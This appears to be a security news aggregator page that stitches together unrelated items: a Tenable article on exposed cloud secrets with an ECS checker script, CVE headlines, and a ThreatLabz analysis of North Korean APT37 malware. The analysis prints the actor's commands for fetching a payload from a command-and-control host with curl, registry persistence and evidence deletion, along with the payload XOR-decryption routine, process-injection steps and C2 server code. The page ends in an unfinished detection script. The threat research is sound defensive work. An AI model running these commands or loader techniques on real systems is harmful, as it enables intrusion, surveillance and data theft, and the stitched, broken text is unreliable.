Secrets at Risk: How Misconfigurations and Mistakes Expose Critical Credentials
Despite all the innovation in cloud computing, one persistent issue lurks in the shadows to undermine security hygiene - poor secrets management. Here, we explain compromised secrets’ impacts and causes and offer concrete risk-mitigation recommendations.
Secrets management: A cloud security challenge
Secrets are credentials used by both human and non-human identities to access systems, applications and data. In modern cloud environments, these include API keys, tokens, access keys and sometimes even usernames and passwords. These secrets are supposed to be protected, but many teams, rushing to deploy new infrastructure and applications, unintentionally leave them exposed by placing them in automation scripts, configurations and even code repositories for convenience.
(Source: “Tenable Cloud Security Risk Report 2025,” June 2025)
The “Tenable Cloud Security Risk Report 2025” noted that a large percentage of organizations expose secrets through misconfigurations and mistakes, specifically:
- 54% expose one or more secrets in Amazon Web Services (AWS) Elastic Container Service (ECS) task definitions
- 52% expose one or more secrets in Google Cloud Platform (GCP) Cloud Run environment variables
- 31% expose one or more secrets in Microsoft Azure Logic App workflow configurations
- 26% expose one or more secrets in AWS Elastic Compute Cloud (EC2) user data scripts
- 9% expose one or more secrets in infrastructure-as-code (IaC)
This Tenable report primarily looked at cloud resource misconfigurations that expose secrets, but secrets are also being exposed in many other ways, including logs, public storage, and public Git repositories. While secrets exposed in Git repositories are not a new phenomenon, Verizon’s “2025 Data Breach Investigations Report” (DBIR) noted that cloud infrastructure secrets account for 15% of all secrets exposed in this way, making it the third-largest category of exposed secrets. Exposed and compromised secrets are a significant security concern, and these findings show that secrets are being mismanaged across all major cloud platforms and beyond. Unfortunately, these exposures are causing real-world impact.
The impact of compromised secrets
Compromised secrets can provide attackers with direct access to your environment. If a compromised secret has sufficient privileges, an attacker can use it to move laterally, escalate their privileges and gain access to critical assets. Therefore, targeting cloud credentials is a common initial or early step in many cloud breaches. According to the 2025 DBIR, secrets associated with cloud infrastructure represent a significant share of exposed credentials.
Let’s look at a few relevant statistics from the 2025 DBIR:
- Credential abuse is the leading initial access vector of breaches, at 22%.
- System intrusion is the leading breach type, at 53%.
- 30% of devices compromised by information stealer (infostealer) malware are enterprise-licensed devices.
- Secrets represent 25% of the data compromised in system intrusion breaches.
Patterns Over Time in Breaches
(Source: Verizon’s “2025 Data Breach Investigations Report,” April 2025 – n for 2025 dataset=12,195)
Once an attacker gains access to a cloud environment, their subsequent actions are driven by their motivation and objective. The majority of breaches are financially motivated – 85%, according to the 2025 DBIR – and ransomware deployment is the most common objective. Recent attacks carried out by the following two groups bear this out:
- Codefinger (2025): This ransomware crew, identified by Halcyon, uses compromised AWS keys to encrypt a victim’s S3 bucket data using AWS server-side encryption with customer-provided keys (SSE-C). They encrypt the data using a key that is only available to the attacker, then mark the files for deletion to start the countdown for their ransom demand.
- Storm-0501 (2024): This threat actor, identified by Microsoft, infiltrates hybrid-cloud environments. They begin by attacking on-premises environments, compromising credentials and moving laterally to the cloud, where they exfiltrate data or deploy ransomware.
These attacks highlight a worrying trend. Threat actors are pivoting to the cloud, focusing on exposed or compromised secrets and leveraging cloud-native features in their attacks. Protecting secrets must therefore be a critical component of every cloud security program.
Common causes of exposed secrets
Despite the well-known risks, secret exposure persists for several reasons, including the sheer volume of secrets created in dynamic cloud environments, a lack of visibility into who owns or has access to which secrets, and inconsistent use of cloud-native secrets managers. A lack of education around proper secrets usage and secure storage is also to blame, and this doesn’t only apply to cloud resources. (For example, infostealer malware is designed to steal secrets from victims’ workstations.) Users with long-term credentials to cloud environments who store them in the browser, text files, or anywhere else other than a password manager are another common cause of exposure.
It is common for the teams implementing secrets to do so without consulting the identity and access management (IAM) or security teams, which are responsible for the governance and security of these credentials. This contributes to the problems listed above, leading to a dispersion of secrets, a variety of methods for managing them and a lack of consistent security controls to protect them. Understanding where secrets are stored, how they are stored, how they are used and by whom is of vital importance.
Best practices to protect secrets and mitigate the impact of abuse
- Involve IAM and security
  - Development, operations, and DevOps teams should involve the IAM and security teams when designing a solution to ensure secrets are properly stored and used, and that the appropriate controls are implemented.
- Avoid using long-term credentials
  - Long-term credentials, such as passwords and keys, should be avoided wherever possible. These are typically associated with user and service accounts stored locally in the cloud provider. Instead, use federation (e.g. SAML 2.0) with temporary credentials.
- Implement lifecycle policies
  - Lifecycle policies should be established to regularly rotate secrets, such as keys, passwords, and certificates.
- Use secrets managers
  - Most cloud service providers offer mature, native secrets management tools that work seamlessly within their cloud (e.g., AWS Secrets Manager, GCP Secrets Manager, Azure Key Vault). Many third-party secrets management solutions also work well in cloud environments. Choose which to adopt and do so consistently and extensively.
  - End users with access to secrets should store them in a password manager approved by their organization.
- Avoid secrets in cloud resource configuration
  - Secrets should not be hardcoded in places like bootstrap scripts, environment variables, and tags. Instead, inject secrets from a secrets manager at runtime.
- Identify public exposure
  - Identify all public cloud storage and workloads, understand the specific access requirements, and restrict all access that is not explicitly required. Assess public and non-public resources to identify issues such as vulnerabilities, misconfigurations, malware, excessive permissions, and toxic combinations of findings that warrant prioritization. Continually monitor for changes to reduce accidental exposure of secrets and other sensitive information.
- Inventory and classify sensitive data
  - Identify where sensitive data, including secrets, reside across your cloud footprint. Understand the access requirements for this data, then implement controls to protect it.
- Audit and monitor access
  - Regularly review secret access logs and alert on suspicious events such as anomalous access patterns and token reuse.
- Create an Incident Response (IR) playbook
  - Establish an IR playbook to create alerts from secrets scanning tools, monitor for anomalous access and external disclosure, identify compromised secrets, then rotate, disable, or delete them.
- Scan infrastructure-as-code (IaC)
  - For cloud environments being built via IaC, assess the IaC in the code repository and within the pipeline to identify cloud resource misconfigurations and exposed secrets, ideally before they reach production.
- Scan application code
  - Application code should also be scanned in the code repository and in the pipeline to identify exposed secrets.
- Secure your cloud identities and entitlements
  - Cloud Infrastructure and Entitlement Management (CIEM) is the process of understanding which human and non-human identities have what type of access to which cloud services and resources, including other secrets. It identifies the net effective permissions of each identity and then compares that to permissions usage to identify overprivileged identities. The privileges granted to an attacker by a compromised secret can either help or hinder them. Using a CIEM, such as Tenable CIEM, to ensure identities only have the necessary permissions can help reduce the blast radius of a compromised or exposed secret.
- Implement a cloud-native application protection platform (CNAPP)
  - A CNAPP, such as Tenable Cloud Security, replaces a patchwork of siloed cloud security products with a single cloud security solution for your multi-cloud environment. CNAPP solutions enable organizations to monitor the health of their cloud footprint on an ongoing basis.
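The ECS task definition finding (54% of organizations) and the "avoid secrets in cloud resource configuration" practice above can be checked mechanically. This is an added example, not code from the Tenable report: both task definitions are constructed, the ARNs and image names are placeholders, and the checker flags plain environment variables that look like credentials while accepting the corrected form, which references Secrets Manager through `secrets[].valueFrom` and uses the task IAM role instead of static access keys.

```python
"""Check an ECS task definition for secrets placed in plain environment variables."""
import json
import re

# Variable names that normally carry credentials.
SECRET_NAME_RE = re.compile(
    r"(secret|passw(or)?d|token|api_?key|access_?key|private_?key)", re.IGNORECASE
)
# Value shapes of common long-term credentials.
VALUE_PATTERNS = {
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "github_token": re.compile(r"\bgh[pousr]_[A-Za-z0-9]{36,}\b"),
    "private_key_block": re.compile(r"-----BEGIN [A-Z ]*PRIVATE KEY-----"),
}

# Constructed sample, the weak form. AKIAIOSFODNN7EXAMPLE is the AWS documentation example key.
WEAK_TASK_DEF = json.loads("""
{
  "family": "payments-api",
  "containerDefinitions": [{
    "name": "api",
    "image": "registry.example/payments-api:1.0",
    "environment": [
      {"name": "AWS_ACCESS_KEY_ID", "value": "AKIAIOSFODNN7EXAMPLE"},
      {"name": "DB_PASSWORD", "value": "constructed-sample-password"},
      {"name": "LOG_LEVEL", "value": "info"}
    ]
  }]
}
""")

# Constructed sample, the corrected form: no static AWS keys (the task role supplies
# temporary credentials) and the password is resolved from Secrets Manager at runtime.
FIXED_TASK_DEF = json.loads("""
{
  "family": "payments-api",
  "taskRoleArn": "arn:aws:iam::123456789012:role/payments-api-task-role",
  "containerDefinitions": [{
    "name": "api",
    "image": "registry.example/payments-api:1.0",
    "environment": [
      {"name": "LOG_LEVEL", "value": "info"},
      {"name": "DB_HOST", "value": "db.internal.example"}
    ],
    "secrets": [
      {"name": "DB_PASSWORD",
       "valueFrom": "arn:aws:secretsmanager:us-east-1:123456789012:secret:payments/db-password"}
    ]
  }]
}
""")


def value_reasons(value):
    """Return the credential shapes a string matches."""
    return [f"value matches {label}" for label, pat in VALUE_PATTERNS.items() if pat.search(value)]


def find_exposed_secrets(task_def):
    """Return one finding per environment variable that appears to hold a secret.

    secrets[] entries are the intended mechanism, so they are only flagged when a
    literal credential has been pasted into valueFrom instead of a store reference.
    """
    findings = []
    for container in task_def.get("containerDefinitions", []):
        cname = container.get("name", "?")
        for env in container.get("environment", []):
            name, value = env.get("name", ""), str(env.get("value", ""))
            reasons = value_reasons(value)
            if SECRET_NAME_RE.search(name):
                reasons.insert(0, "secret-like variable name")
            if reasons:
                findings.append({"container": cname, "variable": name, "reasons": reasons})
        for sec in container.get("secrets", []):
            reasons = value_reasons(str(sec.get("valueFrom", "")))
            if reasons:
                findings.append({"container": cname, "variable": sec.get("name", ""), "reasons": reasons})
    return findings


if __name__ == "__main__":
    for label, task_def in (("weak", WEAK_TASK_DEF), ("fixed", FIXED_TASK_DEF)):
        print(f"{label}: {find_exposed_secrets(task_def)}")
```

The same check runs unchanged against the output of `aws ecs describe-task-definition`, since that returns the same `containerDefinitions` structure.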
Secrets management will likely evolve in the coming years as the usage of agentic artificial intelligence (AI) increases. AI agents will provision and deprovision resources rapidly and autonomously, and will have a clearly defined scope and context for the task at hand. We at Tenable envision several positive changes coming as a result of this:
- An API for agents to dynamically generate just-in-time secrets with lifetimes measured in seconds or minutes
- Secrets generated by identity providers or brokers, based on federated identity tokens
- Secrets managers with an embedded policy engine for fine-grained, dynamic authorization
- Agent-to-agent trust negotiation such that one agent can delegate a task to another and the associated secret is properly scoped and time-bound
- Continuous scanning to identify leaked secrets then automatically revoking and reissuing them
- Secrets replacement with an identity proof (e.g. federated identity token) and a cryptographic attestation (e.g. mutual Transport Layer Security, or TLS)
Yet, we expect that secrets will continue to be an issue due to factors including:
- Legacy systems: Older apps will still rely on configuration files and static passwords for years to come.
- Human factors: Developers will still make mistakes such as hardcoding keys in code, pasting them in Slack, uploading them to GitHub, etc.
- Third-party ecosystems: APIs, SaaS tools, and IoT devices often only support static keys.
- Cost and complexity: Not every company can afford to re-architect for ephemeral, secretless patterns.
Secrets are essential to running modern cloud environments - but when they’re mismanaged or misconfigured, they become one of the easiest ways for attackers to access an environment or move laterally within it. As our research and breach data show, these exposures are alarmingly common and attackers are using them to great effect - often without the need for complex attacks.
Tenable Cloud Security equips your organization with the visibility, automation, and context necessary to reduce your cloud exposure. From detecting exposed secrets to prioritizing the most impactful misconfigurations, vulnerabilities, and toxic combinations, we help your teams reduce risk — without slowing down innovation.
(Source: Tenable Cloud Security: Dashboard widgets showing exposed secrets and toxic combinations of findings)
BSidesSF 2025: Sharing Vulnerabilities
Creator, Author and Presenter: Clint Gibler
Our deep appreciation to Security BSides - San Francisco and the Creators, Authors and Presenters for publishing their BSidesSF 2025 video content on YouTube. The content originates from the conference’s events held at the lauded CityView / AMC Metreon, certainly a venue like no other, and is published via the organization's YouTube channel.
Additionally, the organization is welcoming volunteers for the BSidesSF Volunteer Force, as well as their Program Team & Operations roles. See their succinct BSidesSF 'Work With Us' page, where the appropriate information can be found.
Tech Debt: Why Fixing the Foundation Comes Before Building the Castle
42% of developer time goes to fixing tech debt instead of building features. Knight Capital lost $460M in one day due to unaddressed code issues. Here's why smart companies fix P0/P1 problems first, and the framework that helped me scale startups without constant firefighting.
CVE-2025-3212 | Arm Bifrost GPU Kernel Driver use after free (EUVD-2025-27124)
CVE-2025-40641 | Multi-Purpose Inventory Management System Non-defining Query update product_name cross site scripting (EUVD-2025-27122)
How to Embrace Zero Trust Without Blowing Up Your Network
Zero Trust isn’t just a strategy. It’s a survival skill. “Never trust, always verify” sounds simple enough, but most organizations discover that applying it to sprawling hybrid networks is anything...
Venezuela’s Maduro Says Huawei Mate X6 Gift From China is Unhackable by U.S. Spies
In Caracas this week, President Nicolás Maduro unveiled the Huawei Mate X6 gifted by China’s Xi Jinping, declaring the device impervious to U.S. espionage efforts. The announcement coincides with heightened tensions between Washington and Beijing, as the United States enforces stringent controls on Chinese telecom equipment. Beyond its political symbolism, the Mate X6 has become […]
CVE-2025-10117 | SourceCodester Simple To-Do List System 1.0 Add New Task /fetch_tasks.php cross site scripting
CVE-2025-56630 | FoxCMS up to 1.2.5 Column.php column_model sql injection
Submit #645597: SourceCodester Simple To-Do List System 1.0 Cross Site Scripting [Accepted]
CVE-2025-10116 | SiempreCMS up to 1.3.6 file_upload.php unrestricted upload
CVE-2025-10115 | SiempreCMS up to 1.3.6 user_search_ajax.php name/userName sql injection
Submit #645540: Siempre CMS 1.3.6 Unauthenticated File Upload Allows Server Flooding [Accepted]
Submit #645531: Siempre CMS 1.3.6 SQL Injection in user_search_ajax.php [Accepted]
CVE-2025-10114 | PHPGurukul Small CRM 4.0 /profile.php Name sql injection
CVE-2025-36855 | Microsoft .NET up to 6.0.35 DiaSymReader.dll buffer over-read
CVE-2025-36854 | Microsoft .AspNetCore.App.Runtime.osx-x64 up to 6.0.36 HTTP3 Response Body use after free
1,600 rubles for a week, and three years in prison on the horizon. How a 16-year-old schoolgirl became the first 'drop' (money mule) with real consequences
APT37 Targets Windows with Rust Backdoor and Python Loader
Introduction
APT37 (also known as ScarCruft, Ruby Sleet, and Velvet Chollima) is a North Korean-aligned threat actor active since at least 2012. APT37 primarily targets South Korean individuals connected to the North Korean regime or involved in human rights activism, leveraging custom malware and adopting emerging technologies.
In recent campaigns, APT37 utilizes a single command-and-control (C2) server to orchestrate all components of their malware arsenal, including a Rust-based backdoor that ThreatLabz dubbed Rustonotto (also known as CHILLYCHINO), a PowerShell-based malware known as Chinotto, and FadeStealer. Rustonotto is a newly identified backdoor in use since June 2025. Chinotto is a well-documented PowerShell backdoor that has been in use since 2019. FadeStealer, first discovered in 2023, is a surveillance tool that records keystrokes, captures screenshots and audio, monitors devices and removable media, and exfiltrates data via password-protected RAR archives.
In this blog post, Zscaler ThreatLabz delves into the tactics and tools used by APT37. The technical analysis explores APT37's sophisticated tactics, including spear phishing, Compiled HTML Help (CHM) file delivery, and Transactional NTFS (TxF) for stealthy code injection.
Key Takeaways
- APT37 is a North Korean-aligned threat actor active since at least 2012 that primarily targets individuals connected to the North Korean regime or involved in human rights activism.
- In recent campaigns, APT37 utilizes a single command-and-control (C2) server to orchestrate all components of their malware arsenal, including the Rust-based backdoor we named Rustonotto, the PowerShell-based Chinotto malware, and FadeStealer.
- FadeStealer, first identified in 2023, is a surveillance tool designed to log keystrokes, capture screenshots and audio, track devices and removable media, and exfiltrate data through password-protected RAR archives.
- FadeStealer leverages HTTP POST and Base64 encoding for communication with its command-and-control (C2) server.
- APT37 utilizes Windows shortcut files and Windows help files as initial infection vectors.
- Rustonotto, active since June 2025, is a Rust-compiled malware, representing the first known instance of APT37 leveraging Rust-based malware to target Windows systems.
- Using simple backdoors in the initial stage, the threat actor deployed FadeStealer via a Python-based infection chain.
Overview
S2W published a comprehensive report on the same threat actor, detailing PubNub-based communication malware and the deployment of VCD ransomware. In this blog post, ThreatLabz expands on these findings and highlights the infection chain observed, along with the C2 operations that orchestrate the full tradecraft of this threat actor.
ThreatLabz’s latest findings suggest that APT37 utilized the Rust programming language to create a lightweight backdoor we named Rustonotto, which has basic functionality for executing Windows commands and sending the results to a threat actor-controlled server. While Rustonotto may appear simplistic, the use of Rust highlights the group's ongoing effort to adopt modern languages and potentially support multi-platform attacks. APT37 also employed a Python-based loader implementing the Process Doppelgänging code injection technique to deploy a custom-built stealer designed for data exfiltration.
ThreatLabz collaborated with the Korea National Police Agency (KNPA) by providing technical analysis to support their investigation of APT37.
Technical Analysis
Attack chain
ThreatLabz reconstructed the APT37 infection chain that begins with an initial compromise via a Windows shortcut or a Windows help file, followed by Chinotto dropping FadeStealer through a sophisticated infection process. The attack chain is depicted in the figure below.
Figure 1: Full infection chain involving Chinotto, Rustonotto, and FadeStealer.
Windows shortcut and Rustonotto
In one campaign, APT37 utilizes a Windows shortcut file. When this shortcut file (MD5: b9900bef33c6cc9911a5cd7eeda8e093) is launched, a malicious PowerShell script, Chinotto, is invoked that extracts an embedded decoy and payload using predefined markers. The steps outlined below detail the infection process initiated when the victim executes Chinotto.
- Scans %temp% and the current working directory for its own Windows shortcut file, validating its exact size (6,032,787 bytes) to ensure the correct file is processed.
- Reads the Windows shortcut, converts the byte values to ASCII, and extracts two hex-encoded payloads delimited by the markers AEL (first payload start), BEL (second payload start), and EOF (end of file marker).
- Converts the first hex payload to binary and writes it as C:\ProgramData\NKView.hwp, then launches it as a decoy document.
- Decodes the second payload and writes it as C:\ProgramData\3HNoWZd.exe, which functions as the main executable.
- Creates a scheduled task named MicrosoftUpdate, configured to execute 3HNoWZd.exe every 5 minutes using schtasks.
The decoy document is a Hangul Word Processor (HWP) file titled “Two Perspectives on North Korea in South Korean Society”, which was last modified on June 11, 2025.
Figure 2: Example decoy document dropped by an APT37 Windows shortcut file.
The dropped payload is Rustonotto, which is a Rust-compiled binary (MD5 7967156e138a66f3ee1bfce81836d8d0). Rustonotto receives Base64-encoded Windows commands and returns the execution results also in a Base64-encoded format. The steps below illustrate the sequence of Rustonotto’s behavior, specifically focusing on its C2 communication.
- Establishes an HTTP connection to the C2 server with the U= HTTP query parameter.
- Makes HTTP requests to the C2 server to fetch commands.
- Executes the commands received.
- Captures the command output and sends the result back to the C2 server with the R= HTTP query parameter.
Windows help file and PowerShell-based payload
In another campaign, the threat actor used a Windows help file (CHM) to deliver malware, a method that ThreatLabz has observed APT37 use before. In this case, the victim was sent a RAR file named 2024-11-22.rar. Inside the RAR archive were two files: a password-protected ZIP archive called KT그룹 채용 (translated as KT Job Description) and a malicious Windows help file named Password.chm (which was disguised as a document containing the password for the ZIP archive). The malicious CHM file, when opened, creates a registry value under the Run key to trigger the download and execution of an HTML Application (HTA) file from the threat actor’s server each time the current user logs on. The example below shows how the CHM file is configured to perform this action:
The HTA file (1.html) downloaded by the CHM contains a malicious PowerShell script that acts as a backdoor, allowing the threat actor to control the infected computer remotely. The backdoor known as Chinotto is capable of performing various tasks, such as transferring files, executing commands, modifying the registry, creating scheduled tasks, and more. When Chinotto launches, it creates a unique victim identifier by combining the computer name and the username, which Chinotto uses when communicating with the C2 server. Chinotto connects to the same C2 server URL previously associated with Rustonotto.
To avoid running the malware more than once on the same machine, Chinotto generates a file named %TEMP%\jMwVrHdPtpv as an execution marker. Every 5 seconds, Chinotto checks the threat actor’s C2 server for new instructions via HTTP POST requests, sending the victim ID (formatted as U=[victim ID]). Chinotto then receives commands from the server, which are Base64 decoded, and executed on the infected system. The table below shows the commands supported by Chinotto, along with their description.
- FINFO: Collects file information (name, size, timestamps, path) from a specified directory, saves it to a CSV file, and uploads the CSV to the C2 server.
- DIRUP: Compresses the contents of a specified directory into a ZIP archive and uploads the ZIP to the C2 server.
- SFILE: Uploads a specified file to the C2 server.
- DOWNF: Downloads a file from a given URL and saves it to a specified path.
- CURLC: Uses curl to download a file from a URL and saves it to a specified path.
- REGED: Modifies the Windows registry at a specified location, setting the name and value.
- TASKA: Creates a scheduled task to run a specified command at regular intervals.
- ZIPEX: Extracts the contents of a ZIP archive to a specified destination.
- RENAM: Renames a specified file or directory.
- DELET: Deletes a specified file or directory.
Table 1: Commands supported by the Chinotto backdoor.
When Chinotto completes execution, it sends a Base64-encoded done message back to the C2 server with the R= HTTP query parameter.
Transacted injection
The threat actor's hands-on-keyboard activities with the implanted Chinotto variant involved delivering malicious payloads packaged in Microsoft Cabinet (.CAB) files. These payloads, equipped with Python-based launchers, were extracted and executed upon delivery.
The commands used to deliver and execute the payloads are outlined in the table below.
- curl http://[redacted]/images/test/wonder.dat -o "c:\programdata\wonder.cab"
  Fetches the Microsoft Cabinet (CAB) file payload from the C2 server.
- expand c:\programdata\wonder.cab -F:* c:\programdata
  Extracts the contents of the .CAB file to the specified directory.
- del /f /q c:\programdata\wonder.cab
  Deletes the .CAB file to remove evidence.
- reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v TeleUpdate /d "c:\programdata\tele_update\tele_update.exe c:\programdata\tele_update\tele.conf c:\programdata\tele_update\tele.dat" /f
  Adds a registry entry to enable automatic execution at system startup or login.
- c:\programdata\telegram_update\tele_update.exe c:\programdata\telegram_update\tele.conf c:\programdata\telegram_update\tele.dat
  Launches FadeStealer with its associated configuration and data files.
Table 2: Example APT37 commands executed to deliver FadeStealer.
Each payload executed during the threat actor’s hands-on-keyboard activity includes three components:
- A legitimate Python module (tele_update.exe).
- A compiled Python module (tele.conf) that decrypts and loads FadeStealer from a file named tele.dat.
- The FadeStealer payload (tele.dat), Base64-encoded and XOR encrypted.
The compiled Python module, created on 2025-04-01 05:42:03, is internally named TransactedHollowing.py, suggesting the use of a technique for stealthily injecting and executing arbitrary code within a legitimate Windows process.
The script is designed to process a single input file containing a Base64-encoded payload. The script decodes the payload and applies a custom XOR-based decryption routine to extract a Windows executable. The decrypted executable is intended for injection into a target process. The following code demonstrates the decryption routine used to unpack the payload.

```python
import base64


def decrypt_custom_encoded_file(file_path):
    try:
        # Open the file in binary mode and read its content
        with open(file_path, "rb") as file:
            encoded_data = file.read()
        # Decode the content from base64
        decoded_data = base64.b64decode(encoded_data)
        # Read offset and update it
        offset = decoded_data[0]
        offset += 1
        # Get key length and update offset
        key_length = decoded_data[offset]
        offset += 1
        # Extract the XOR key
        xor_key = decoded_data[offset : offset + key_length]
        offset += key_length
        # Decrypt the rest of the data using XOR with the key
        decrypted = bytes([
            decoded_data[i] ^ xor_key[(i - offset) % key_length]
            for i in range(offset, len(decoded_data))
        ])
        return decrypted
    except (OSError, ValueError, IndexError) as exc:
        # The handler for the try block is reconstructed here; the original handler
        # is not shown on the page.
        print(f"failed to unpack {file_path}: {exc}")
        return None
```

After unpacking the original payload, the Python script employs the Process Doppelgänging technique to inject the payload into a legitimate Windows process. The technique involves the following steps:
Transacted file creation and section object setup
- The script uses Windows Transactional NTFS (TxF) APIs (e.g., CreateFileTransactedW) to create a new file within a transaction context.
- The decrypted Portable Executable (PE) payload is written to the transacted file.
- The function NtCreateSection is called to create a memory section object, using the transacted file as the backing store for the payload's memory.
- The transaction is rolled back (RollbackTransaction), while preserving the section object in memory.
- The temporary file handle is closed, and the file is deleted, leaving no trace of the payload on disk.
Suspended process creation
- The script randomly selects a legitimate Windows system executable from a predefined list. Examples include: calc.exe, msinfo32.exe, svchost.exe, GamePanel.exe, UserAccountControlSettings.exe, and control.exe.
- The script creates a new process associated with the chosen executable in a suspended state.
Section mapping, context manipulation, and execution
- The section object containing the payload is mapped into the address space of the suspended process using NtMapViewOfSection.
- The script modifies the thread context of the suspended process (via GetThreadContext / SetThreadContext or their Wow64 equivalents) to redirect execution to the payload's entry point.
- The Process Environment Block (PEB) of the target process is updated to reflect the new image base address associated with the injected payload.
- The main thread of the process is resumed (ResumeThread), triggering the execution of the injected payload.
The decrypted malware is FadeStealer, the same data-theft tool previously documented by AhnLab.
FadeStealer periodically gathers files from the infected system, compresses them into password-protected RAR archives, and transmits them to a C2 server. When launched, FadeStealer creates working directories under the %TEMP%\VSTelems_Fade\ folder. FadeStealer has two main functions: automatically exfiltrating sensitive files and sending specific files as directed by commands specified by the threat actor.
FadeStealer file stealing commands
Once connected to the C2 server, FadeStealer receives Base64-encoded commands specifying a file path and a search pattern, separated by the | character. These commands direct the malware to gather target files based on the criteria provided. After collecting the files, FadeStealer creates a timestamped RAR archive (e.g., data_YYYY_MM_DD-HH_MM_SS.rar) and sends it back to the C2 server. Some example commands are listed below:
- C:\Users\|*.doc
  Collect all Word documents from the Users directory.
- C:\Documents\|*.*
  Collect all files from the Documents folder.
- D:\|*.pdf
  Collect all PDF files from the D: drive.
Table 3: Example commands supported by FadeStealer.
FadeStealer surveillance
In surveillance mode, FadeStealer operates multiple threads, each dedicated to monitoring and collecting specific types of data from the infected system. These threads function independently to capture keystrokes, screenshots, audio recordings, and file content from connected devices. In the table below, the capabilities, collection frequency, file naming patterns, and storage locations of the malware are listed.
- Records all keystrokes (real-time): key_YYYY_MM_DD.log in %TEMP%\VSTelems_Fade\NgenPdbk\
- Captures screen images (every 30 sec): YYYY_MM_DD-HH_MM_SS.jpg in %TEMP%\VSTelems_Fade\NgenPdbc\
- Records microphone audio (5-min sessions): YYYY_MM_DD-HH_MM_SS.wav in %TEMP%\VSTelems_Fade\NgenPdbm\
- Monitors for USB devices (every 1 hour): usb_YYYY_MM_DD-HH_MM_SS.rar in %TEMP%\VSTelems_FadeOut\
- Monitors cameras/portable devices (every 1 hour): [DeviceName]_YYYY_MM_DD-HH_MM_SS.rar in %TEMP%\VSTelems_FadeIn\
Table 4: Surveillance capabilities and corresponding files associated with FadeStealer.
FadeStealer compiles all the collected data into a RAR archive every hour, using a naming format like watch_YYYY_MM_DD-HH_MM_SS.rar. This archive includes files stored in the main directory (%TEMP%\VSTelems_Fade\), which contain keylogging data, screenshots, audio recordings, and captured files. A separate thread is responsible for uploading these archives to the C2 server.
To ensure timely exfiltration, another thread actively monitors and identifies archived RAR files every 10 seconds, sending them to the C2 server upon detection. In the table below, the source directories, archive types, and the contents of the collected data are outlined.
- %TEMP%\VSTelems_Fade\ (watch_YYYY_MM_DD-HH_MM_SS.rar): Hourly surveillance data consolidated (keylogging, screenshots, audio).
- %TEMP%\VSTelems_FadeOut\ (usb_YYYY_MM_DD-HH_MM_SS.rar): USB device contents collected when inserted.
- %TEMP%\VSTelems_FadeIn\ ([DeviceName]_YYYY_MM_DD-HH_MM_SS.rar): MTP-enabled devices such as smartphones, cameras, and media player contents gathered during monitoring.
- Any location (data_YYYY_MM_DD-HH_MM_SS.rar): Files collected via remote commands.
Table 5: Filenames and paths used for surveillance by FadeStealer.
When sending files, FadeStealer uses HTTP POST requests with multipart form data, specifying myboundary as the boundary name. Additionally, when creating a RAR archive, FadeStealer utilizes the hardcoded password NaeMhq[d]q to encrypt the RAR content and employs a custom RAR.exe tool extracted from its embedded resources.
C2 server
The threat actor leveraged vulnerable web servers to act as C2 servers for managing malware operations. The C2 PHP script used by APT37 is a lightweight and file-based backend, facilitating communication between the threat actor and the malware implants. The C2 server enables command delivery, result collection, and file uploads, all organized within a single JSON file (info).
Using this simple yet effective script, the threat actor controlled the entire suite of malware tools used in the campaign. This included Rustonotto, Chinotto, and FadeStealer, all of which utilized the same Base64-encoded format for communication.
While some malware variants featured slight differences in command structures, the C2 server PHP script provided unified and streamlined control over the entire malware toolset. The figure below illustrates how the C2 server functioned as a central hub for delivering commands, collecting results, and handling uploads across the different malware components in the campaign.

Figure 3: APT37 C2 server architecture for Rustonotto, Chinotto, and FadeStealer.

The APT37 C2 server maintains two arrays: a parent array for storing results received from the malware implant and a child array for storing commands issued by the threat actor. The code sample below demonstrates how the APT37 C2 server initializes its operation.

```php
…
// Create the store on first run: one empty placeholder entry per array.
if (!file_exists("info"))
{
file_put_contents("info", '{"parent" : [{"id" : "", "text" : ""}], "child" : [{"id" : "", "text" : ""}]}');
}
// Load the JSON store into memory for the rest of the request.
$jsonStored = '';
$jsonStored = json_decode(file_get_contents("info"));
…
```

The APT37 C2 server handles incoming HTTP requests differently depending on whether they originate from the threat actor or the malware implant. Requests are processed based on specific types and associated parameters, as outlined in the table below.

| Request Type | Parameter | Description |
|---|---|---|
| GET/POST | U=parent | When the threat actor sends the query string U=parent, the C2 sends back the entire parent array, containing results from the clients. After delivering the response, the C2 resets the parent array to empty. |
| GET | U=&C= | When the threat actor issues a command for a specific client, the Base64-encoded command is decoded and stored in the child array under the client's ID. If the entry already exists, it is updated; otherwise, a new entry is created. The command is delivered to the client during its next poll and then cleared from the store. |
| POST | U=&R= | When a client sends back a result, the result is Base64-decoded and stored in the parent array under the client's ID. If the entry already exists, it is updated; otherwise, a new entry is created. The threat actor can later retrieve these results using the query string U=parent. |
| POST | U=&_file= | When a client uploads a file, it is saved in the current directory with a filename prefixed by the client's ID. The final filename format is _. If the file already exists, the data is appended. |
| GET/POST | U= | When a client polls for commands without sending a result or file, the script checks the child array for pending commands. If a command is found, it is delivered and cleared. If no command exists, the script checks the parent array. If no result is present, it responds with a default handshake message ("SEVMTw==", Base64 for "HELLO"). |

Table 6: APT37 C2 server HTTP parameters and their corresponding purposes.

The threat actor retrieves exfiltrated files from the compromised machine by issuing a direct GET request to the C2 server, leveraging prior knowledge of the client ID and the specific file name.
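Because the whole C2 grammar is carried in a handful of parameters (U, C, R, _file) plus the fixed multipart boundary and handshake token, it lends itself to request-level triage on a compromised web server or at a proxy. The script below is an added example, not code from the ThreatLabz write-up or from the actor's PHP: it labels each captured request as an operator action, an implant action, or unrelated, following Table 6, flags uploads that use FadeStealer's hardcoded boundary, and decodes the default handshake reply. The HttpRequest record, the /up.php path, the client ID PC-01 and the traffic at the bottom are all constructed for the demo; the Base64 values in the samples are placeholders.

```python
"""Triage HTTP requests against the APT37 C2 request grammar of Table 6.

Meant for proxy or web-server request captures, where both query string and
POST body are available.  The HttpRequest type, the /up.php path, the client
ID PC-01 and the sample traffic are constructed for this demo.
"""
import base64
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple
from urllib.parse import parse_qs, urlsplit

HANDSHAKE_B64 = "SEVMTw=="          # default C2 reply when nothing is queued
MULTIPART_BOUNDARY = "myboundary"   # boundary hardcoded by FadeStealer uploads


@dataclass
class HttpRequest:
    method: str
    url: str                                   # path plus query string
    headers: Dict[str, str] = field(default_factory=dict)
    body: str = ""


def _params(req: HttpRequest) -> Dict[str, str]:
    """Merge query-string, form-encoded and multipart field names into one
    name -> value dict (multipart values are not needed, so they are '')."""
    query = urlsplit(req.url).query
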